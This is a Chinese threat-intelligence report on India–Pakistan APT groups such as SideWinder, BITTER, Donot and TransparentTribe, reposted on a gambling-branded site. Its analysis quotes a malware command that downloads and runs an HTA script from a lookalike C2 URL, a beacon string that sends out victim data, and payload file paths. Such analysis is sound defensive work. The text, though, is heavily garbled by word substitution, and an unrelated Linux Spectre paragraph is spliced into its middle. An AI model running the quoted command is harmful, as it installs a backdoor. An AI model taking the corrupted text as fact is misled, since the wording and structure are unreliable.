印巴战役暗影下的收集战——近期印巴APT构造进击运动汇总 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

印巴战役暗影下的收集战——近期印巴APT构造进击运动汇总

申博_新闻事件 申博 29次浏览 未收录 0个评论

一、背景

印度和巴基斯坦同属于南亚地区的两个国度,然则因为一些汗青缘由,两国关联一向不大友善,争执不停。从2019年终最先,两边关联倏忽慌张,争执晋级。2月26日,印度空军飞越克什米尔印巴现实控制线,被巴基斯坦军方击落并俘获一位印度空军飞行员,同时这也是印度初次突击巴基斯坦境内。前段时间两国在克什米尔印戎行集结而且频仍交火,印方以至水淹巴基斯坦,翻开阿尔奇大坝,形成巴基斯坦面对大水的危急,同时印方几日前公然声称,能够会先对巴基斯坦运用核武步伐。

跟着两边的军事争执愈演愈烈时,网络战场上也硝烟四起。就在印度空军被俘事宜后,腾讯平安御见要挟谍报中心曾捕捉并宣布了一例以此次争执事宜为钓饵的APT进击样本,剖析后确认了该样本源于巴基斯坦的APT进击构造TransparentTribe(见参考文章1),别的印度针对巴基斯坦的进击运动也一向在延续中,腾讯平安御见要挟谍报中心也曾屡次宣布相干的剖析报告(见参考文章2、3)。

网络战被认为是地缘政治的延长,以至是战役和争执的一部份。APT进击做为网络战中的重要进击运动,其活泼趋向跟地缘政治等环球热点问题密切相干,环球APT进击多发地区也是环球地缘政治争执的敏感地区。纵观2019年活泼的网络进击运动,无一不是政治形势庞杂和敏感的地区,包括朝鲜半岛、委内瑞拉、中东等等。网络战已成为国度间政治博弈以至是现代战役的重要组成部份。

回到印巴争执中,腾讯平安御见要挟谍报中心捕捉到大批关于印巴网络进击的歹意样本。经由深度剖析和跟踪溯源,我们归类出较为活泼的几个APT构造,包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot,TransparentTribe等。同时在剖析溯源的过程当中,我们还发明APT构造之间相互假装,试图来殽杂平安职员剖析,隐匿追踪。本文为对该些运动和构造的一些总结,能够会存在肯定的疏漏,还请业内偕行再作补充。

二、疑似来自印度的进击

印方在对巴基斯坦的网络进击运动中,一向处于强势和主导的田地,还涉及到跟印度相干的APT进击构造也相对较多,较有代表性的包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot等。

1、SideWinder(响尾蛇)

· 构造概略

SideWinder(响尾蛇)是腾讯平安御见要挟谍报中心最早在2018年表露的APT进击构造,得名由来为该构造的背景跟卡巴斯基在2018年第一季度报告中提到的SideWinder构造异常的类似,虽然卡巴斯基并未宣布任何该构造的手艺细节和报告。即使如此,我们照样继承相沿卡巴斯基的定名,定名该构造为”响尾蛇”。
该构造的最早的进击运动能够追溯到 2012 年。在2019年2月,腾讯平安御见要挟谍报中心再次细致的表露过该构造在2018年下半年的一些进击运动。别的,国内有多个平安公司也同时表露过该构造的其他的一些进击运动。

· 进击目的

重要为巴基斯坦政府部门(如内阁部门)、巴基斯坦军方、军事目的等。

· 手艺手段

SideWinder(响尾蛇)重要采纳鱼叉进击的体式格局,投递带有破绽的office文档或许包括歹意lnk的压缩包文件,受害者翻开office文档或许歹意lnk文件后会下载实行hta文件,经由过程实行hta剧本进一步下载后门RAT。

如某次进击的垂纶邮件:

如某次进击的钓饵:

压缩包解压后为一个歹意的lnk文件:

实行命令:

%windir%\system32\mshtb.exe http://www.download.fbr.gov.pk.cdn-ps.net/images/5DC7A431/11991/5183/fad436c7/60b9f1d

实行的剧本后,除了网络当地杀软信息外,还会解密钓饵pdf文件内容而且翻开,跟着继承下载下一阶段的hta剧本。

翻开的钓饵pdf内容为:

hta剧本为终究会运用一个白加黑手艺,来实行终究的后门文件SystemApp.dll,该后门用来举行信息的网络,包括体系信息、文件信息等。

白加黑文件:

后门内容:

别的,其他的进击中,该构造还会运用VB的RAT,如:

· 构造小结

2、BITTER(蔓灵花) & Patchwork(白象)& White Company & Confucius(孔子)

· 构造概略

之所以把这几个构造放在一同,是因为我们置信,该四个构造之间都存在肯定的关联,以至为统一构造或统一构造分化出来的差别的小组。如BITTER(蔓灵花)跟Patchwork(白象)和另有Confucius(孔子),我们不止一次的在我们的剖析报告中指出存在包括武器库、基础设施等的共用的证据,如《蔓灵花(BITTER)APT构造针对中国境内政府、兵工、核能等敏感机构的最新进击运动报告》等。

个中,蔓灵花最早在2016由美国平安公司Forcepoint举行了表露,而且定名为“BITTER”,得名由来为初期的特马的数据包中都包括字符“BITTER”做为标识,因而得名。同年国内友商360也跟进宣布了剖析报告,定名为“蔓灵花”。固然该构造除了针对巴基斯坦举行进击外,也在频仍的针对中国大陆的目的举行进击运动。

白象构造,也叫摩诃草、Patchwork、HangOver,该最早能够追溯到2009年11月,至今还异常活泼。一样该构造除了针对巴基斯坦举行进击外,也在频仍的针对中国大陆的目的举行进击运动。

White Company为2018年由cylance公司表露的APT构造,虽然该公司的报告中未明确指出该构造的背景,然则从我们的剖析发明,该构造一样来自印度,而且我们也进一步发明,该构造的武器库和白象相堆叠。

Confucius(孔子)为Palo Alto Networks Unit 42在2016年发明针对南亚特定人群的要挟构造。该构造在歹意代码和基础设施上与白象和蔓灵花均存在堆叠,但目的稍有差别。

· 进击目的

· 手艺手段

这几个构造都习气运用鱼叉进击的体式格局,投递含有破绽或宏的office文档、带有破绽的InPage文件、自解压文件等。

如蔓灵花的钓饵文档:

如白象的钓饵:

如Confucius(孔子)的钓饵:

而实行钓饵文档后,终究的武器库也略有差别。

如蔓灵花:

蔓灵花第一阶段木马平常都为一个downloader,除了下载第二阶段的相干木马外,还会网络用户的相干信息,如上报信息:

"?a=administ-b24c70&b=ADMINIST-B24C70&c=Microsoft%20Windows%20XP&d=AdministratorAdministrator3fb4c154-b52a-4667-8a49-4fbe422781b5365536040965860&e="

上报内容包括主机名、盘算机名、操作体系名、用户名等。

而第二阶段为下发响应的插件,插件内容包括增加开机启动、键盘记录、终究的远控木马等。

别的,蔓灵花还存在一些运用习气,如文件目次习气运用new_downloader_xxx:

而下载地点习气运用healthne:

如白象:

本年最常运用的特马为名为badnews的特马,运用github和feed43等公用平台用来分发C&C:

特马功用:

印巴战役暗影下的收集战——近期印巴APT构造进击运动汇总

· 构造关联

我们之前的文章已屡次指出了BITTER、白象、Confucius之间的关联,本文偏重形貌下白象跟White Company之间的关联。

如我们从肯定白象的某个样本中(97187e5e8b9a752b5f6377df3bea17b5),发明了样本中包括了提权破绽CVE-2016-7255的模块:

把该模块dump下来后,依据模块的特性我们举行搜刮,发明了某篇文章中:

Linux LTS 版本内核 CPU Spectre 侧信道漏洞补丁分析

通过这篇文章我将深入分析最近的一个Specter漏洞补丁程序,其中一个补丁是手动打到Linux内核中的。我将介绍此修复程序所采取的方法,从其发出警告到向后移植到Long Term Support (LTS) kernels时被破坏。我们将研究后端漏洞的原理以及导致这种backporting失败的upstream过程中的bug。还会介绍我们是如何独立挖到此漏洞的以及我们的Respectre插件是如何自动修复这个底层漏洞的。 我能够找到的最早版本的补丁程序是来自于Dianzhang Chen的这个补丁,它是在201

跟文章中的代码完整类似(https://www.alienvault.com/blogs/labs-research/off-the-shelf-rats-targeting-pakistan):

而我们队该破绽的一切公然应用的代码经由征采,以及对该模块的特性举行搜刮,均未在其他的进击运动中发明跟该模块婚配的应用代码和代码构造,因而我们推断该特权应用模块为该构造特有,而该文章暴光的运动的构造跟白象为统一个或许能通用武器库的进击小组。

而继承对该文章中表露的构造举行研究,我们发明该进击构造就位cylance暴光的White Company:

· 构造小结

3、Donot Team

· 构造概略

Donot Team是2018年被暴光的APT进击构造,最早在2018年3月由NetScout公司的ASERT团队举行了表露,随后国内的厂商奇安信也举行了表露。该构造的得名由来为某进击文件中的pdb中含有donot(如样本59733668b3ad8056ffd4c5c9db876cbc,pdb为:C:\Users\donot\Documents\Visual Studio 2010\Projects\downloader\Debug\downloader.pdb),因而取名为Donot Team,国内的平安厂商奇安信经由过程音译定名为肚脑虫,我们继承相沿该定名。该构造重要针对巴基斯坦举行进击运动。

· 进击目的

巴基斯坦政府部门、巴基斯坦军方、金融机构、外贸人士等。

· 手艺手段

Donot Team一般会投递带有歹意宏的office文档文件,文档名和文档内容都具有很强的针对性。

如运用巴基斯坦空军的钓饵:

印巴战役暗影下的收集战——近期印巴APT构造进击运动汇总

如假装巴基斯坦国度银行Excel盘算器:

当受害者翻开office歹意样本后,会提醒实行宏代码,点击实行后会开释包括剧本和后门顺序的压缩包,然后解压实行剧本,剧本终究会启动后门木马。

相干宏代码:

开释的压缩包:

实行剧本代码:

终究实行的歹意文件,会依据返回的Content-Typel来举行下一步行动:

1) 当返回的为application时则会将返回的包解码exe后存储到  %userprofile%\\DriveData\\Files\\目次下。

2) 当返回的是cmdline时,则会实行%userprofile%\\DriveData\\Files\\wuaupdt.exe

3) 当返回的是batcmd的时,则会实行%userprofile%\\DriveData\\Files\\test.bat

4) 除了windows上的进击外,Donot Team还具有挪动端的进击才能。如运用安卓特马StealJob的进击流程(泉源奇安信博客剖析,见参考文章4):

相干功用:

· 构造小结

三、疑似来自巴基斯坦的进击

巴方在对印度的网络进击运动中,一向处于弱势和挨打的职位,现在发明的相干的APT进击构造也相对较少,较有代表性的是TransparentTribe。

· 构造概略

TransparentTribe APT构造,又称ProjectM、C-Major,该构造的运动最早能够追溯到2012年。该构造的相干运动在2016年3月被proofpoint表露,趋向科技随后也跟进举行了相干运动的表露。

腾讯平安御见要挟谍报中心曾在上半年暴光过该构造的相干进击运动《TransparentTribe APT构造2019年针对印度政府、军事目的的进击运动报告》。

· 进击目的

印度政府、印度军方、军事研究机构等。

· 手艺手段

TransparentTribe一般投递带有歹意宏的office文档,钓饵文档内容多与政府、军事相干,当受害者翻开歹意文档后,会提醒实行宏代码,平常点击实行后钓饵内容才会显示出来。

如跟印度陆战研究中心(CLAWS)相干钓饵:

如跟印度国防学院(NDC)相干钓饵:

印巴战役暗影下的收集战——近期印巴APT构造进击运动汇总

宏代码实行后会开释一个压缩包文件,并解压出包括的木马后门实行:

在后门运用上,该构造照旧运用CrimsonRAT、.net loader、.net droper、PeppyRAT 相干特马:

印巴战役暗影下的收集战——近期印巴APT构造进击运动汇总

而经由腾讯平安御见要挟谍报中心的数据溯源,该构造疑似跟巴基斯坦别的一个构造Gorgon Group有肯定的关联:

· 构造小结

四、存在的假旗(false flag)

在印巴两边网络战延续不停时,个中Donot Team和TransparentTribe 两个APT构造引发我们分外的注重,经由细致剖析后发明两个疑似仇视构造不停的相互模拟,影响平安研究职员对其追踪溯源。

比方Donot样本宏代码和TransparentTribe样本宏代码高度类似,能够看到Donot宏代码解释的处所,解释的这段代码是要实行的exe途径,然则Donot现实上实行的是bat剧本,我们再对比下TransparentTribe就可以发明,TransparentTribe才是实行exe的。而且Donot样本中这段被解释的代码与TransparentTribe样本中的一致(左侧Donot,右侧TransparentTribe):

而且部份代码函数都是如出一辙的,函数定名和常量值(左侧Donot,右侧TransparentTribe):

印巴战役暗影下的收集战——近期印巴APT构造进击运动汇总

以至在某些样本中两个APT构造开释的木马称号都完整一样(左侧Donot,右侧TransparentTribe):

我们置信,印巴两边的构造还会继承模拟下去,这必将给平安研究职员在定性上发生更多的滋扰。

五、总结

从上文能够看到,因为印巴两国的长期以来的慌张关联,网络进击一向都没住手过。即使两国的运动屡次被平安公司所暴光,然则各自国度的构造完整没住手进击的意义,相反是愈来愈凶猛。2019年对印巴两国来讲,是个不镇静的一年,双边的形势争执不停,网络战也一浪高过一浪。我们置信,这类网络对抗会延续举行下去。

没有网络平安就没有国度平安,跟着政治形势的恶化,网络战必将会愈演愈烈。虽然我们处于战争年代,然则我们的相干部门和单元切纪要进步小心,保证重点部门和单元的网络平安。

六、平安发起

针对重要政府机构、重点企业、科研单元的APT进击,已成为网络战背景下的一样平常狙击运动,进击者日常平凡以探听谍报、入侵渗入为主,一旦争执加重,随时能够提拔进击损坏的烈度。腾讯平安专家发起相干敏感单元增强网络信息体系平安治理,增强对员工的平安意识教诲,防患于未然。可参考以下几点:

1、发起不要翻开不明泉源的邮件附件;除非异常清晰文档泉源牢靠,不然发起不要启用Office实行宏代码;

2、实时装置体系补丁和重要软件的补丁;

3、运用杀毒软件防备能够的病毒木马进击。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明印巴战役暗影下的收集战——近期印巴APT构造进击运动汇总
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址